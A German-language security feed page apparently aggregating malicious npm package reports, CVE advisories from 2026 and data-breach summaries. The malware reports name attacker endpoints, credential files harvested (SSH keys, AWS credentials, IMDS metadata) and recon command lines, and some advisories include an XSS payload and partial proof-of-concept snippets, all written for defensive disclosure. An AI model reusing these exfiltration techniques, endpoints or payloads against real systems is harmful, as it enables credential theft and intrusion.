| Risiko / Label | Veröffentlichung | |
|---|---|---|
| Risiko ? / 10 MAL-2026-6067 | vor 2 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (9a7779ff21d9783e1026e13a7abf65e448c5f3d3d111f3cae539f3690e53a2b4) The CLI binary at bin/scan-only.js, when invoked (e.g., via `npx scan-only --diagnose`), harvests installer-side secrets and ships them to a hardcoded attacker endpoint, then fetches and executes attacker-controlled shell commands. Specifically, the binary reads ~/.gitconfig, ~/.ssh, ~/.npmrc (npm token), ~/.aws/credentials, ~/.docker/config.json, ~/.bash_history, ~/.zsh_history, the full process.env, os.userInfo(), and network interfaces, packages them into a `recon` object, and POSTs them to https://sentry.citadel-casino.com/collect with a hardcoded `x-api-key` header and user-agent `citadel-diagnose/0.2.0`. It also fetches https://sentry.citadel-casino.com/decoy, runs a `refineText()` routine that extracts a hidden command via an acrostic of first letters terminated by `endofpayload`, unescapes tokens like `sbslash` to `\`, and passes the result to execSync via `/bin/sh` on Unix or `powershell -EncodedCommand` on Windows — giving the operator of sentry.citadel-casino.com arbitrary code execution on the host running the CLI. The exfiltration output is masked by fake `Sentry Diagnostic Tools v1.2.0` console banners, and the Sentry-lookalike subdomain on citadel-casino.com is brand-impersonation cover. package.json's generic `Diagnostic tool` description and `scan-only` bin name disguise the binary's true `citadel-diagnose` identity. Harm fires the moment a developer or CI system runs the CLI. | ||
| Risiko ? / 10 MAL-2026-6071 | vor 2 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (fa97d4701c29ef5305fa5b553ab560abd6db6cc33b72f99dc11621997b668f32) Package presents as an n8n community node but is an attack artifact. The node's execute() in dist/SecurityTestNode.node.js queries AWS IMDSv1/v2 (http://169.254.169.254/latest/meta-data/iam/security-credentials/) and ECS metadata (169.254.170.2) for IAM role credentials, then iterates process.env to harvest every key matching /AWS|AMAZON|ECS|ECR/i, returning all of it in the node's workflow output. Any installer who adds this node to a workflow on an EC2/ECS host leaks the host IAM role's STS credentials and AWS env vars to the workflow output (which is typically persisted/logged) — direct AWS account compromise. The tarball additionally ships preinstall.js, which runs `id && hostname && whoami && uname -a && cat /etc/os-release`, writes /tmp/n8n-rce-proof.txt, and POSTs the recon output to https://worker.n8n-prod.schibsted.com/rest/variables (with rejectUnauthorized:false) and to 127.0.0.1:5678/rest/variables, using a hardcoded `n8n-auth` JWT cookie belonging to a third-party org's n8n deployment. package.json does not declare a preinstall lifecycle hook, so the recon payload does not auto-fire on `npm install`, but the file is bundled as a ready-to-run RCE proof and the JWT is redistributed to anyone who installs the package. The combination of (a) credential-harvest node code reachable on first workflow execution, (b) shipped exfiltration payload with hardcoded victim infrastructure, and (c) redistribution of a third-party auth token makes this an attack artifact regardless of the author's stated PoC framing. | ||
| Risiko ? / 10 MAL-2026-6069 | vor 2 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (e51e58cf925eb7dd4e084a2e78e22b0a0db0f1f82663101e34110258839f98f7) The package declares `"preinstall": "node index.js"` in package.json, causing index.js to execute automatically on `npm install`. index.js requires `child_process`, `os`, `https`, and `http`, then collects host and user identity — `whoami`, `id`, `os.hostname()`, `process.platform`, architecture, homedir, `os.userInfo()` (username/uid/gid/shell), OS details, and cwd — and POSTs them as JSON to the hardcoded URL `https://277k5lhnsb38srix1rr2le9g177yvpje.oastify.com/detox56` (oastify.com is the Burp Collaborator out-of-band interaction service, commonly abused as recon/C2 infrastructure). The package ships no legitimate functionality — empty description, empty author, no UI code despite the `bot-ui` name — and the `@civitatis` scope plus generic name shape are consistent with a dependency-confusion attack against an internal namespace. Installing this package on any developer machine or CI runner immediately leaks host identity to the attacker. | ||
| Risiko 5 / 10 CVE-2026-55590 | vor 2 Stunde(n) | |
| ### Impact The `getLoginRedirect()` method contains a weakness to backslash bypasses allowing redirect targets with attacker controlled hostnames. ### Patches 3.3.6 and 4.1.1 contain a fix for this issue. ### Workarounds If you are unable to upgrade, you should consider adding application validation to the redirect query string parameter to mitigate this vulnerability. | ||
| Risiko 9.5 / 10 CVE-2026-55518 | vor 2 Stunde(n) | |
| ## Summary
A critical missing authorization flaw exists in Avo's association attach workflow. The UI and `GET /resources/:resource/:id/:related/new` path can check `attach_ |
||
| Risiko 5 / 10 CVE-2026-55517 | vor 2 Stunde(n) | |
| ## Summary A Deno program that opens a client `WebSocket` connection could be crashed by the remote server. While handling the WebSocket handshake response, Deno parsed the `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` response headers in a way that assumed their bytes were always printable ASCII. A response header containing non-visible-ASCII bytes (`0x80`-`0xFF`) caused a panic that aborted the entire Deno process. ## Details When establishing a client WebSocket connection, Deno read the `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` headers from the server's `101 Switching Protocols` response and converted them to strings without handling the failure case. `HeaderValue::to_str()` returns an error for any value containing bytes outside the visible-ASCII range, so a header carrying such bytes triggered an unrecoverable error during conversion. Because the client initiates the outbound connection, the handshake response is fully controlled by the server. A server that returns bytes such as `0xFF 0xFE` in either header could therefore crash any client that connected to it. This is purely an availability issue. There is no information disclosure and no memory-safety impact; the only effect is termination of the current process. ## Impact Remote denial of service. Any Deno application that establishes WebSocket connections to untrusted or potentially-compromised endpoints could be terminated by the remote peer. Exploitation requires the victim application to initiate the outbound WebSocket connection. An attacker who controls the WebSocket endpoint, or who can man-in-the-middle a plaintext `ws://` connection, could trigger the crash. The effect is confined to crashing the process that opened the connection. ## Patch The issue is fixed in Deno `2.7.5`. The header values are now parsed with graceful fallbacks: values that cannot be represented as ASCII strings are skipped instead of aborting the process. A regression test covers a server that returns non-ASCII bytes in `Sec-WebSocket-Protocol`. Users should upgrade to Deno `2.7.5` or later. ## Workarounds Until you can upgrade, only connect to trusted WebSocket endpoints and prefer `wss://` (TLS) over `ws://`, which prevents a network man-in-the-middle from injecting malicious header bytes into the handshake response. | ||
| Risiko 9.5 / 10 CVE-2026-55471 | vor 2 Stunde(n) | |
| ### Summary
`org.hl7.fhir.utilities.XsltUtilities` exposes two parallel families of XSLT
transform helpers. The `transform(...)` overloads obtain their
`TransformerFactory` from the project's hardened helper
`XMLUtil.newXXEProtectedTransformerFactory()` (which sets
`ACCESS_EXTERNAL_DTD=""` and `ACCESS_EXTERNAL_STYLESHEET=""`). The sibling
`saxonTransform(...)` overloads instead instantiate a **bare**
`new net.sf.saxon.TransformerFactoryImpl()` with no external-access
restriction. A document transformed through any `saxonTransform(...)` overload
is parsed with external general entities and external DTD/parameter entities
enabled, so an attacker who controls (or can MITM) the transformed XML obtains
XML External Entity injection: local file disclosure and blind XXE / SSRF to
arbitrary URLs reachable from the host.
`XMLUtil` documents that its protected factory "should be the only place where
TransformerFactory is instantiated in this project". The `saxonTransform`
overloads violate that contract while their same-file `transform` siblings
honour it.
### Affected versions
`org.hl7.fhir.utilities` (Maven `ca.uhn.hapi.fhir:org.hl7.fhir.utilities`)
`<= 6.9.8` (latest release at time of report; verified live on `6.9.8`).
The bare `net.sf.saxon.TransformerFactoryImpl()` instantiation is present at
`XsltUtilities.java:61`, `:91`, and `:106`.
### Privilege required
None at the library boundary. The exposure depends on the calling tool: any
FHIR component that runs `XsltUtilities.saxonTransform(...)` over XML whose
source document, embedded DTD, or referenced stylesheet is attacker-influenced
(an IG package, a fetched/uploaded resource, a downloaded stylesheet, or a
MITM'd HTTP fetch) triggers the XXE. No DOCTYPE/entity stripping occurs before
the Saxon parser sees the bytes.
### Root cause
`org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/XsltUtilities.java`:
```java
// VULNERABLE — bare factory, no external-access restriction (lines 60-73, 90-99, 105-128)
public static byte[] saxonTransform(Map |
||
| Risiko 7.5 / 10 CVE-2026-55470 | vor 2 Stunde(n) | |
| ## Summary
The fix for CVE-2026-45367 added `RegexTimeout` protection to the `matches()` function in DSTU2016MAY, DSTU3, R4, R4B, and R5, but the DSTU2 module was incompletely patched. In `org.hl7.fhir.dstu2`, `replaceMatches()` was updated while `matches()` at line 2462 still calls the raw `String.matches(sw)` without any timeout, allowing an unauthenticated attacker to trigger catastrophic regex backtracking and exhaust server CPU.
## Details
### Incomplete patch
Within the same file
(`org.hl7.fhir.dstu2/utils/FHIRPathEngine.java`), the two functions were
patched inconsistently:
**Line 2226 — replaceMatches() — PATCHED:**
```java
result.add(new StringType(
RegexTimeout.replaceAll(
convertToString(focus.get(0)), regex, repl, regexTimeoutMillis)));
```
**Line 2462 — matches() — NOT PATCHED:**
```java
result.add(new BooleanType(
convertToString(focus.get(0)).matches(sw)));
// ↑ raw String.matches() — no RegexTimeout, no complexity check
```
**DSTU3 line 2447 — matches() — PATCHED (for comparison):**
```java
result.add(new BooleanType(
RegexTimeout.matches(st, sw, regexTimeoutMillis)));
```
### Module-by-module status
| Module | `matches()` | `replaceMatches()` |
|---|---|---|
| **DSTU2** | ❌ raw `str.matches(sw)` | ✅ `RegexTimeout.replaceAll()` |
| DSTU2016MAY | ✅ `RegexTimeout.matches()` | ✅ |
| DSTU3 | ✅ `RegexTimeout.matches()` | ✅ |
| R4 | ✅ `RegexTimeout.matches()` | ✅ |
| R4B | ✅ `RegexTimeout.matches()` | ✅ |
| R5 | ✅ `RegexTimeout.matches()` | ✅ |
## PoC
**Requirements:** Java 17+, Maven 3.8+
**pom.xml dependencies:**
```xml
|
||
| Risiko 9.5 / 10 CVE-2026-55450 | vor 2 Stunde(n) | |
| ### Summary
Unauthenticated users can upload any amount of data to the server without any limitations. No need for any prior knowledge, only network access to Langflow.
This can lead to space exhaustion on the server.
In adition, in the response, the absolute path of the uploaded file is reported to the attacker, which is an information leak that can assist in chaining other primitives.
Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe
### Details
Code is in `langflow/api/v1/[endpoints.py](http://endpoints.py/)`:
```python
@router.post(
"/upload/{flow_id}",
status_code=HTTPStatus.CREATED,
deprecated=True,
)
async def create_upload_file(
file: UploadFile,
flow_id: UUID,
) -> UploadFileResponse:
...
```
As can be seen above, there is no authentication. There is not validation over `flow_id` as well, unlike other endpoints:
```
flow_id_str = str(flow_id)
file_path = await asyncio.to_thread(save_uploaded_file, file, folder_name=flow_id_str)
```
Function `save_uploaded_file` saves the file to local file-system.
Suggested fix:
1. Add authentication to route.
2. Only return relative path or filename.
### PoC
PoC:
```bash
curl 'http://localhost:7860/api/v1/upload/ |
||
| Risiko 7.5 / 10 CVE-2026-55760 | vor 2 Stunde(n) | |
| ### Impact Any application that passes user-controlled input to Handlebars.compile() using a FileTemplateLoader (or ClassPathTemplateLoader) is vulnerable to arbitrary file read. This is a realistic attack surface for web applications that use template names from URL path parameters, request parameters, or other user-controlled sources. ### Patches com.github.jknack:handlebars:4.5.2 ### Workarounds Validate template name is derived from user input. ```java if (!file.getPath().startsWith(new File(prefix).getCanonicalPath())) { throw new IOException("Path traversal attempt detected: " + location); } ``` | ||
| Risiko 7.5 / 10 CVE-2026-55409 | vor 2 Stunde(n) | |
| In Filament v3, a disabled `RichEditor` field rendered its raw state without sanitizing HTML. Where the data stored in this field's state isn't sanitized already when the form state was filled, an attacker could plant malicious HTML or JavaScript and achieve XSS that executes for users who view the form. Please note that Filament v4 and above does not use the same mechanism for rendering a disabled `RichEditor` so this advisory does not apply. | ||
| Risiko 7.5 / 10 CVE-2026-55405 | vor 2 Stunde(n) | |
| ### Summary
The MariaDB and pgvector embedding stores build metadata-filter SQL by string-concatenating
filter **keys** (and, in MariaDB, string **values**) directly into the query without adequate
escaping. A crafted metadata key in `EmbeddingSearchRequest.filter()` can break out of its SQL
context and inject arbitrary SQL into the statements executed by the stores' search and
`removeAll(Filter)` operations.
### Details
**pgvector — JSON mode (default, `COMBINED_JSON` / `COMBINED_JSONB`).** `JSONFilterMapper`
places the key inside a single-quoted SQL literal (the JSON key of the `->>` operator) with no
escaping:
(metadata->>' |
||
| Risiko ? / 10 MAL-2026-6070 | vor 2 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (280cf690237f367f57670f695c85d84227b06c563f5f1c1c3f69d437c52cbfe4) Importing libsc-runtime-telemetry auto-invokes a bootstrap routine that schedules a periodic job collecting host identity (hostname, public IP, reverse DNS, ISP/geo/AS), network interfaces (including internal IPs and MACs), OS user info (username, uid, homedir), tmpdir, cwd, process.argv (which routinely contains secrets passed as CLI arguments in CI/CD), execPath, NODE_ENV, parent package name/version, and pid/ppid. The payload is POSTed as a row to a hardcoded Google Sheets spreadsheet ID (1rcJGX8rVZ_KlHvqcCQ5IzGLqQ2Er5E3_lI799FBUYcU) via Google service-account credentials bundled inside dist/bundled/reporter-config.js (client_email libsc-service-account-785@libsc-499701.iam.gserviceaccount.com, embedded RSA private key). The destination is not configurable by the consumer — only an opt-out env var (SKIP_LIBSC_CHECK) is honored — making any application that depends on this library a silent feed of deployment fingerprints to the author. The shipped service-account private key additionally authorizes any installer to write to the author's Google Cloud project, allowing tampering with collected data from other victims. | ||
| Risiko 7.5 / 10 CVE-2026-7300 | vor 3 Stunde(n) | |
| Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') vulnerability in RTI Connext Professional (Web Integration Service) allows Filter Failure through Buffer Overflow.This issue affects Connext Professional: from 7.4.0 before 7.*, from 7.0.0 before 7.3.1.3, from 6.1.2 before 6.1.*. | ||
| Risiko 9.5 / 10 CVE-2026-53805 | vor 3 Stunde(n) | |
| NVIDIA Spatial Intelligence Lab's (SIL) GEN3C contains an unauthenticated remote code execution vulnerability in the inference API server where the /request-inference and /seed-model endpoints deserialize raw HTTP request bodies using Python's pickle.loads() without authentication or input validation. Attackers can supply a crafted payload containing a __reduce__ gadget to the inference API port to achieve remote code execution as the inference process. | ||
| Risiko 5 / 10 CVE-2026-48591 | vor 3 Stunde(n) | |
| Improper Neutralization of Script in Attributes in a Web Page vulnerability in pragdave earmark allows stored cross-site scripting via unescaped HTML attribute values. 'Elixir.Earmark.Transform':_make_att1/2 in lib/earmark/transform.ex splices attribute values verbatim between two literal " bytes: [" ", name, "=\"", value, "\""]. Text nodes are routed through the existing escape function which encodes " as ", but attribute values never visit that path. A markdown link whose URL or title contains a bare " closes the attribute early and lets the trailing bytes be parsed by the browser as fresh HTML attributes. For example, [click](http://example.com/?a=x" onerror="alert(1)) renders as click, executing arbitrary JavaScript in the victim's browser. The earmark library is no longer maintained and has been retired on Hex. No patched version will be released. All releases from 1.4.1 onward are affected, and users should migrate to a maintained Markdown library such as MDEx. This issue affects earmark from 1.4.1 onward. | ||
| Risiko 9.5 / 10 CVE-2026-3894 | vor 3 Stunde(n) | |
| Out-of-bounds Read vulnerability in RTI Connext Professional (Core Libraries) allows Overread Buffers.This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.3, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*, from 5.0.0 before 5.2.*. | ||
| Risiko 2 / 10 CVE-2026-39199 | vor 3 Stunde(n) | |
| snes9x 1.63 allows an out-of-bounds write and denial of service via a crafted .ups file. | ||
| Risiko 7.5 / 10 CVE-2026-30802 | vor 3 Stunde(n) | |
| Out-of-bounds Read vulnerability in RTI Connext Micro (Core Libraries) allows Overread Buffers.This issue affects Connext Micro: from 4.0.0 before 4.3.0. | ||
| Risiko 7.5 / 10 CVE-2026-30803 | vor 3 Stunde(n) | |
| Integer Underflow (Wrap or Wraparound) vulnerability in RTI Connext Micro (Core Libraries) allows Overread Buffers.This issue affects Connext Micro: from 4.0.0 before 4.3.0. | ||
| Risiko 5 / 10 CVE-2026-30799 | vor 3 Stunde(n) | |
| Missing Authentication for Critical Function vulnerability in RTI Connext Professional (Security Plugins) allows Identity Spoofing.This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.*, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*. | ||
| Risiko 5 / 10 CVE-2026-2675 | vor 3 Stunde(n) | |
| Missing Authentication for Critical Function vulnerability in RTI Connext Professional (Security Plugins) allows Fake the Source of Data.This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.3, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*. | ||
| Risiko 9.5 / 10 CVE-2026-20266 | vor 3 Stunde(n) | |
| In Splunk AI Toolkit versions below 5.7.4, a user who holds the "admin" Splunk role could execute arbitrary OS commands on the host running the Splunk Enterprise instance. The vulnerability is possible because of an unsafe shell execution pattern in the btool configuration helper, which constructs OS command strings from dynamic parameters without disabling shell interpretation. | ||
| Risiko 9.5 / 10 CVE-2026-53874 | vor 4 Stunde(n) | |
| picklescan before 1.0.1 contains an unsafe deserialization vulnerability allowing unauthenticated users to execute arbitrary code by hiding eval calls nested under callable objects via getattr. Attackers can embed malicious code in pickle files that evades detection but executes when the pickle is loaded from untrusted sources. | ||
| Risiko 9.5 / 10 CVE-2026-36418 | vor 4 Stunde(n) | |
| JimuReport versions 2.3.4 and below are vulnerable to remote code execution due to improper handling of Aviator expressions. The /jmreport/executeSelectApi endpoint passes user-supplied input directly to the Aviator expression engine without adequate validation allowing attackers to execute arbitrary code. | ||
| Risiko 2 / 10 CVE-2026-35068 | vor 4 Stunde(n) | |
| Dell PowerFlex Manager, version(s) [Versions], contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to information disclosure. | ||
| Risiko 7.5 / 10 CVE-2026-32652 | vor 4 Stunde(n) | |
| Dell AIOps Collector versions prior to 1.18.3 contain a "Use of Default Credentials" vulnerability. A low privileged attacker with console access could potentially exploit this vulnerability to gain Filesystem access. This vulnerability only affects fresh installations of Collector versions earlier than 1.18.3. Systems that have been upgraded (either manually or automatically) to version 1.18.3 or later are not impacted, even if they were originally installed on an earlier version. | ||
| Risiko 5 / 10 CVE-2026-20220 | vor 4 Stunde(n) | |
| A vulnerability in the web-based management interface of Cisco Crosswork Network Controller could allow an authenticated, remote attacker to execute arbitrary commands on an affected device. This vulnerability is due to insufficient input validation in the configuration template engine of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system in limited areas of the file system. This vulnerability affects only areas of the operating system for which the template user has write permissions. To exploit this vulnerability, the attacker must have valid template user credentials with write permissions. Template users with read permissions cannot exploit this vulnerability. | ||
| Risiko 7.5 / 10 CVE-2026-5667 | vor 8 Stunde(n) | |
| Use of Hard-coded Credentials vulnerability in Mitsubishi Electric Room Air Conditioners (for Japan and outside Japan); Wireless LAN Adapters for Room Air Conditioners (for Japan and outside Japan); Wireless LAN Adapters for Packaged Air Conditioners (for Japan and outside Japan); Refrigerators (for Japan); Heat Pump Water Heaters / HEMS-Compatible Adapters / Wireless LAN Adapters (for Japan); Bathroom Dryer / Heater / Ventilation Systems (for Japan); Adapters for Airflow Ventilation Systems, Heat Pump Chilled / Hot Water Systems, and Ventilation / Air-Conditioning System Air Resorts (for Japan); Lossnay Central Ventilation Systems (for Japan); Smart Switches for Ventilation Fans and Lossnay (for Japan); IH Cooking Heaters (for Japan); and Rice Cookers (for Japan) allows an attacker within Wi-Fi radio range of an affected product to access the affected product using a hard-coded SSID and password, thereby obtaining device data such as operation status, room set temperature, and room temperature; changing the air-conditioner or Wi-Fi settings; or causing Wi-Fi communication to enter a denial-of-service (DoS) condition. | ||
| Risiko 5 / 10 CVE-2026-46448 | vor 1 Tag(en) | |
| ## Affects - Nova: >=18.0.0 <31.3.1, >=32.0.0 <32.2.1, >=33.0.0 <33.0.2 ## Description Erichen from the Institute of Computing Technology, Chinese Academy of Sciences reported that Nova's server create API does not strip internal scheduler hints. An authenticated user can bypass Placement resource claims and scheduling constraint enforcement, including availability zone, host aggregate, and image trait restrictions. The resulting instance has no Placement allocation, which can lead to compute node resource exhaustion and cross-tenant data persistence on NVMe devices after instance deletion. Deployments running Nova 18.0.0 or later are affected. ## Patches - https://review.opendev.org/993604 (2025.1/epoxy) - https://review.opendev.org/993603 (2025.2/flamingo) - https://review.opendev.org/993602 (2026.1/gazpacho) - https://review.opendev.org/993601 (2026.2/hibiscus) ## Credits - Erichen from Institute of Computing Technology, Chinese Academy of Sciences (CVE-2026-46448) | ||
| 15.06.2026 - June 2026 Stealer Logs | 56.278.397 Datensätze geleaked | |
| Email addresses, Passwords In June 2026, a collection of accumulated stealer logs from various sources was added to HIBP. The corpus comprised 56M unique email addresses across hundreds of millions of stealer log records. The data also contained 124M unique passwords, which have been added to Pwned Passwords and are now searchable. Individuals can view any records captured against their email address in the stealer logs section of their dashboard. Organisations can see logs affecting their domain via the stealer logs API. |
||
| 09.06.2026 - University of Nottingham | 454.635 Datensätze geleaked | |
| Academic records, Citizenship statuses, Dates of birth, Disabilities, Email addresses, Ethnicities, Genders, IP addresses, Names, Passport numbers, Phone numbers, Physical addresses, Purchases, Salutations, Usernames In June 2026, the University of Nottingham was the target of a cyber attack, later linked to a ShinyHunters "pay or leak" extortion campaign. Tens of gigabytes of data were subsequently published online and included 455k unique email addresses along with extensive personal information including names, addresses, phone numbers, ethnicities, disabilities, passport numbers and information relating to academic enrolments and fee payments. In a post about the incident, the university advised that the breach affected both "current students, and alumni". |
||
| 30.05.2026 - Atlas Menu | 63.926 Datensätze geleaked | |
| Email addresses, IP addresses, Passwords, Support tickets, Usernames In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes. |
||
| 29.05.2026 - BCD Travel | 396.313 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets. |
||
| 23.05.2026 - Baker Distributing | 102.935 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In May 2026, the HVAC/R wholesale distributor Baker Distributing Company was added to the ShinyHunters data extortion group's "pay or leak" site. In early June, the group publicly published data they claimed had been obtained from Baker's SharePoint and Salesforce infrastructure including 103k unique email addresses along with names, physical addresses, phone numbers and tickets relating to the company's HVAC contractor customer base. The exposed data was largely corporate contact and support information with limited sensitivity. |
||
| 23.05.2026 - Charter | 4.851.517 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated. |
||
| 23.05.2026 - DentaQuest | 2.553.599 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Government issued IDs, Health insurance information, Names, Phone numbers, Physical addresses In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat. |
||
| 05.05.2026 - Cushman & Wakefield | 310.431 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations In May 2026, the real estate services firm Cushman & Wakefield was the target of a "pay or leak" extortion campaign by the ShinyHunters group. Following the threat, the group publicly published data they alleged had been obtained from the firm, consisting mostly of C&W email addresses along with tens of thousands of external email addresses and corporate contact records. The exposed data was primarily business information, including names, job titles, company addresses and phone numbers. |
||
| 30.04.2026 - Reborn Gaming | 126 Datensätze geleaked | |
| Email addresses, IP addresses In April 2026, the gaming community Reborn Gaming suffered a data breach due to a vulnerability in cPanel and WebHost Manager (WHM). The breach exposed 126 unique email addresses along with IP addresses and Steam IDs. Reborn Gaming self-submitted the data to Have I Been Pwned. |
||
| 28.04.2026 - Vimeo | 119.167 Datensätze geleaked | |
| Email addresses, Names In April 2026, the ShinyHunters extortion group listed Vimeo on their extortion portal as part of their "pay or leak" campaign. They subsequently published hundreds of gigabytes of data, predominantly consisting of video titles, technical data and metadata. The data also included 119k unique email addresses, sometimes accompanied by names. Vimeo attributed the exposure to a breach of Anodot, a third-party analytics vendor, and advised the incident does not include "Vimeo video content, valid user login credentials, or payment card information". |
||
| 26.04.2026 - CTT | 468.124 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In April 2026, data allegedly obtained from CTT, Portugal's national postal service, was posted to a public hacking forum. The data included 468k unique email addresses along with names, phone numbers and parcel tracking numbers which can be used to retrieve the tracking history of the parcel. |
||
| 24.04.2026 - Udemy | 1.401.259 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Payment methods, Phone numbers, Physical addresses In April 2026, online training company Udemy was the victim of a “pay or leak” extortion attempt perpetrated by the ShinyHunters group. The data was subsequently leaked publicly and contained 1.4M unique email addresses belonging to customers and instructors. The data also included names, physical addresses, phone numbers, employer information and instructor payout methods including PayPal, cheque and bank transfer. |
||
| 20.04.2026 - ADT | 5.488.888 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Partial government issued IDs, Phone numbers, Physical addresses In April 2026, home security firm ADT confirmed a data breach by ShinyHunters, which listed the company on its website as part of a "pay or leak" extortion attempt. The breach impacted 5.5M unique email addresses along with names, phone numbers and physical addresses. ADT also advised that "in a small percentage of cases, dates of birth and the last four digits of Social Security numbers or Tax IDs were included" and that it had contacted all affected people. |
||
| 20.04.2026 - Aman | 215.563 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Language preferences, Names, Nationalities, Phone numbers, Physical addresses, Spouses names, VIP statuses In April 2026, the ultra-luxury hotel brand Aman was named by ShinyHunters as the target of a "pay or leak" extortion campaign, with the data allegedly obtained from their Salesforce CRM. The data was subsequently leaked publicly and contained over 200k unique email addresses. Whilst not present on all records, the data also included genders, physical addresses, phone numbers, nationalities, dates of birth, spouse names and VIP status codes. |
||
| 20.04.2026 - Canada Life | 237.810 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses, Salutations, Support tickets In April 2026, Canada Life was the victim of a "pay or leak" extortion campaign by the ShinyHunters group. The group subsequently published the data which contained over 200k unique email addresses along with names, phone numbers, physical addresses and, in some cases, customer support tickets. In their disclosure notice, Canada Life advised that "it is a small proportion of our customers who may have been impacted". In the wake of the incident, Canada Life also published an alert cautioning customers to be wary of phishing attacks, a pattern often seen after the public release of breached data. |
||
| 20.04.2026 - Pitney Bowes | 8.243.989 Datensätze geleaked | |
| Email addresses, Job titles, Names, Phone numbers, Physical addresses In April 2026, the hacking collective ShinyHunters claimed to have obtained data from Pitney Bowes as part of a broader extortion campaign that also named several other organisations. After negotiations allegedly failed, the group publicly released the data which included 8.2M unique email addresses, along with names, phone numbers and physical addresses. A subset of the data also included Pitney Bowes employee records with job titles. |
||
| 18.04.2026 - Carnival | 7.531.359 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Loyalty program details, Names, Salutations In April 2026, the notorious hacking collective ShinyHunters claimed they had obtained a substantial volume of data belonging to the Carnival cruise operator and attempted to extort the organisation to prevent the data from being leaked. The following week, the group published the data publicly, which contained 8.7M records with 7.5M unique email addresses. The data contained fields indicating it related to the Mariner Society loyalty program run by Holland America, a cruise line brand under Carnival, and included names, dates of birth, genders and data relating to status within the loyalty program. Carnival acknowledged a phishing incident involving a single user account and advised they were working to better understand the scope of the unauthorised activity. |
||
| 15.04.2026 - Kemper | 269.299 Datensätze geleaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement. |
||
| 15.04.2026 - Zara | 197.376 Datensätze geleaked | |
| Email addresses, Geographic locations, Purchases, Support tickets In April 2026, the fashion brand Zara was among a number of organisations targeted by the ShinyHunters extortion group as part of their "pay or leak" campaign. The group claimed the breach was related to a compromise of the Anodot analytics platform and subsequently published a terabyte of data allegedly including 95M support ticket records. The data contained 197k unique email addresses alongside product SKUs, order IDs and the market the support ticket originated in. Zara's parent company Inditex advised that the incident didn't affect passwords or payment information. |
||
| 14.04.2026 - Abrigo | 711.099 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the fintech software company Abrigo was targeted in a "pay or leak" extortion attempt by the ShinyHunters group. Shortly after, data allegedly taken from the company's Salesforce instance was published publicly and contained over 700k unique email addresses belonging to both Abrigo staff and external contacts. Whilst separate from Abrigo's Salesforce compromise via the Drift application connector the previous year, the data fields described in that incident are consistent with the ShinyHunters data, namely that it was "business contact information" including "institution name, employee name, email addresses, and phone numbers". |
||
| 12.04.2026 - Marcus & Millichap | 1.837.078 Datensätze geleaked | |
